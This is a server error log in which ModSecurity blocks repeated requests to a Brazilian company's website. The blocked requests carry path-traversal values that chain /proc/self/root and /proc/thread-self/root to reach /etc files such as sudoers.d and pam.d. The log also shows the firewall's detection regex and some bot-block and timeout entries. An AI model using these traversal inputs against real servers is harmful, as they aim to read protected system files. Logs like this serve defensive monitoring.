[Tue Mar 17 16:52:23.150983 2026] [:error] [pid 2473:tid 140411716749056] [client 74.7.241.31:41440] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/tuned"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmw96BJNF7axNlVR0UpcgAAAAM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 16:52:23.734960 2026] [:error] [pid 2473:tid 140411599251200] [client 74.7.241.31:41440] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/sudoers.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmw96BJNF7axNlVR0UpcwAAABE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 16:52:25.043899 2026] [:error] [pid 26799:tid 140411607643904] [client 74.7.241.31:41450] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/xdg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmw-da6ubjKNq_cu4YZYwAAA1A"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 16:52:27.267681 2026] [:error] [pid 29151:tid 140411733534464] [client 74.7.241.31:52080] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/postfix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmw-_PqhzTj3BvfDX-YxgAAAcE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 16:52:29.482327 2026] [:error] [pid 26799:tid 140411666392832] [client 74.7.241.31:52094] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/yum"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmw_da6ubjKNq_cu4YZaQAAA0k"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 16:52:31.638863 2026] [:error] [pid 2598:tid 140411649607424] [client 74.7.241.31:52100] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/ipmi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmw_xj0p0SRWAqcjGGKhAAAAws"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 16:52:40.126134 2026] [proxy_fcgi:error] [pid 25836:tid 140411557287680] (70007)The timeout specified has expired: [client 179.188.53.243:38298] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 16:52:45.479740 2026] [:error] [pid 2473:tid 140411674785536] [client 74.7.241.31:52106] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/pm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmxDaBJNF7axNlVR0UpfQAAAAg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 16:52:48.323441 2026] [:error] [pid 18380:tid 140411574073088] [client 74.7.241.31:55958] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/pure-ftpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmxEK4xEDsg_V3ESNZcuwAAAhQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 16:52:52.256397 2026] [:error] [pid 29151:tid 140411624429312] [client 74.7.241.31:55968] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/xinetd.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmxFPPqhzTj3BvfDX-Y1gAAAc4"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 16:53:02.177818 2026] [proxy_fcgi:error] [pid 25836:tid 140411666392832] (70007)The timeout specified has expired: [client 179.188.53.243:38834] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 16:53:05.518869 2026] [:error] [pid 25836:tid 140411590858496] [client 74.7.243.128:37890] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/wpa_supplicant"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmxIYh-PF_25v4hFRB8XwAAARI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 16:53:06.699394 2026] [:error] [pid 19507:tid 140411599251200] [client 74.7.241.31:55974] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/skel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmxItY0UrI5A3LftIwOjQAAAZE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 16:53:14.686046 2026] [:error] [pid 6296:tid 140411624429312] [client 74.7.241.31:50810] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/audit"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmxKnIk7brgkOH-rIWdSAAAAU4"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 16:53:25.326351 2026] [proxy_fcgi:error] [pid 2473:tid 140411699963648] (70007)The timeout specified has expired: [client 179.188.53.243:39236] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 16:53:47.029848 2026] [proxy_fcgi:error] [pid 7437:tid 140411674785536] (70007)The timeout specified has expired: [client 179.188.53.243:39756] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 16:54:10.125972 2026] [proxy_fcgi:error] [pid 29151:tid 140411649607424] (70007)The timeout specified has expired: [client 179.188.53.243:40612] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 16:54:11.188787 2026] [:error] [pid 6296:tid 140411574073088] [client 74.7.241.31:50826] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/pam.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmxY3Ik7brgkOH-rIWdiwAAAVQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 16:54:13.411075 2026] [:error] [pid 7437:tid 140411582465792] [client 74.7.244.43:51702] [client 74.7.244.43] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abmxZQeiSKl8TjouI-YpLQAAA9M"]
[Tue Mar 17 16:54:32.123203 2026] [proxy_fcgi:error] [pid 2598:tid 140411741927168] (70007)The timeout specified has expired: [client 179.188.53.243:41194] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 16:54:41.663323 2026] [:error] [pid 6296:tid 140411607643904] [client 74.7.243.128:46378] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/uwsgi.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmxgXIk7brgkOH-rIWdpwAAAVA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 16:54:43.064998 2026] [:error] [pid 6296:tid 140411683178240] [client 74.7.228.61:37016] [client 74.7.228.61] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abmxg3Ik7brgkOH-rIWdqwAAAUc"]
[Tue Mar 17 16:54:46.090469 2026] [mime_magic:error] [pid 29151:tid 140411649607424] (70014)End of file found: [client 74.7.243.128:40736] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php, referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/lib/firmware
[Tue Mar 17 16:54:54.841826 2026] [proxy_fcgi:error] [pid 25836:tid 140411733534464] (70007)The timeout specified has expired: [client 179.188.53.243:41858] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 16:55:06.623506 2026] [:error] [pid 6296:tid 140411624429312] [client 74.7.241.31:50826] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/telegraf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmxmnIk7brgkOH-rIWdyAAAAU4"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 16:55:16.129782 2026] [proxy_fcgi:error] [pid 6296:tid 140411708356352] (70007)The timeout specified has expired: [client 179.188.53.243:42560] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 16:55:18.338727 2026] [:error] [pid 7437:tid 140411548894976] [client 74.7.241.31:60418] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/audisp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmxpgeiSKl8TjouI-YpTAAAA9c"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 16:55:20.121881 2026] [:error] [pid 26799:tid 140411708356352] [client 74.7.241.31:33776] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/profile.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmxqNa6ubjKNq_cu4YZngAAA0Q"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 16:55:23.093792 2026] [:error] [pid 2473:tid 140411725141760] [client 74.7.241.31:33788] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/issue.net"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmxq6BJNF7axNlVR0Up4QAAAAI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 16:55:26.046739 2026] [:error] [pid 7004:tid 140411666392832] [client 74.7.241.31:33796] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/portreserve"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmxrsU6Sx0TG1YjmQjAJwAAAok"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
